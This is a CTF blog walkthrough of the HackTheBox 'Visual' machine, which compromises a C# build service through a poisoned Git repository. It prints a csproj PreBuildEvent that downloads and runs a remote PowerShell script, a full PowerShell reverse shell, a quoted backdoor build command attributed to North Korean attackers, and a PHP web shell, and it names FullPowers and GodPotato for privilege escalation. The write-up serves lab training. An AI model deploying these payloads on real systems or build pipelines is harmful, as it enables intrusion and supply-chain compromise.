VISUAL MEDIUM HACKTHEBOX
Visual is a medium-level hackthebox machine. In this blog, we are going to solve it.
NETWORK ENUMERATION
As always we will start with the port scan. We can achieve this by using tools like Nmap, naabu, and many others.
──(kalirizz㉿kali)-[~/.ctfs/htb/visual-windows]
└─$ sudo nmap -sC -sV -p- - min-rate 1200 -oN nmap-tcp.txt 10.10.11.234
[sudo] password for kalirizz:
Starting Nmap 7.94 ( https://nmap.org ) at 2023–10–03 16:57 EDT
Nmap scan report for 10.10.11.234
Host is up (0.17s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.59 secondsWe only have one port open. Let's visit it.
WEB ENUMERATION
LANDING PAGE
This looks like an Online compiler for C# projects and supports the .NET 6.0 version.
Let’s see if it will fetch some file from my attack machine
On our Attacker machine. We got a request back
It says our URL is invalid and does not contain the sln file.
Let's grab any C# project from Git Hub and try to feed it through our simple Python webserver.
I grab this one.
https://github.com/lunardoggo/CSharpBeginnerProjects.git
Clone it and host it using Python webserver.
python3 -m http.server 8888
Again. We got this but the repository does contain the SLN file for the project. So it must be the second one.
Maybe we need to host it using a git service. We can use various tools for that. For Example, Gittea, Gogs, and other services will allow us to host our personal git repository,
Gitea can be set up using docker.
Just save the basic config as docker-compose.yaml and start the container using docker-compose up.
Now Visit the website at `localhost:3000` and click on install. Then register the account and login.
After creating a repository we need to clone it and set up a dot net project.
This is a great resource which explains how to attack Visual Studio For initial access.
https://www.outflank.nl/blog/2023/03/28/attacking-visual-studio-for-initial-access/
This blog explains one of the most common ways of hiding a backdoor is by using prebuilt events in the sln file.
Let's set up one of our own dotnet project. For this, we will need a dotnet sdk which can be obtained using a docker container.
[Docker Image For .NET SDK](https://hub.docker.com/_/microsoft-dotnet-sdk/)
Let’s run the docker container. we also need to make sure that we mount our gitea repository with it.
sudo docker run -it -v ~/Documents/visual/test/:/mnt mcr.microsoft.com/dotnet/sdk:6.0 bash
We can use this tutorial to create the dotnet project.
Make sure to add 6.0 at the end as the command above i made a mistake in the screenshot and had to repeat it over.
dotnet new console
Will create a new simple Hello World project for us. But we need to add sln file and add our project to the sln file as well.
Now lets push it.
add the obj folder as well. it contains assets.
I had to upload them manually due to some error
Now let's add this to the visual website.
We see the request made from the visual server
INITIAL FOOTHOLD
This
Explains the common way of hiding backdoors using prebuilt events. The same technique was used by North Korean hackers to infect systems using polluted git repositories,
<PreBuildEvent>
<Command>
powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path x64\Debug\Browse.VC.db)){rundll32 x64\Debug\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }
</Command>
</PreBuildEvent>We are going to change the reverse shell.
<Project Sdk="Microsoft.NET.Sdk">
<PropertyGroup>
<PreBuildEvent>
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8888/rev.ps1')
</PreBuildEvent>
<OutputType>Exe</OutputType>
<TargetFramework>net6.0</TargetFramework>
<ImplicitUsings>enable</ImplicitUsings>
<Nullable>enable</Nullable>
</PropertyGroup>
</Project>Rev.ps1
$client = New-Object System.Net.Sockets.TCPClient(‘10.10.14.8’,6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Let’s get the processes and enumerate them. Can seem to transfer the winpeas be antivirus is enabled.
LATERAL ESCALATION
Let’s enumerate manually.
The xampp service is not running under the enox user. May be we can escalate.
Lets make a basic backdoor.
<?php system($_GET[“cmd”]);?>
in the root of xampp server.
we need to make sure our output file is encoded as ascii.
Let’s visit the shell in the website.
Let's get a reverse shell as a local service.
we can use this reverse shell here.
Transfer this reverse shell to the xampp directory with the appropriate changes and after that trigger it from the browser.
On the nc listner shell.
PRIVILEGE ESCALATION ROOT
Now we need to search for ways to escalate further.
Fortunately, this blog explains how we can achieve just that.
>https://itm4n.github.io/localservice-privileges/
Also, i found the reference to the tool called full power at the end. https://github.com/itm4n/FullPowers
Download this and transfer it to the machine.
Now we just need to execute it.
Lets check our privileges.
We can see we have all the privileges back.
Lets search how to gain Admin using SeImpersonatePrivilegs
Let try GodPotato as its the latest one.
Lets run it .
Now we can establish a reverse shell.
On Listner Side:
We have the root.
If you enjoyed this do give a follow.
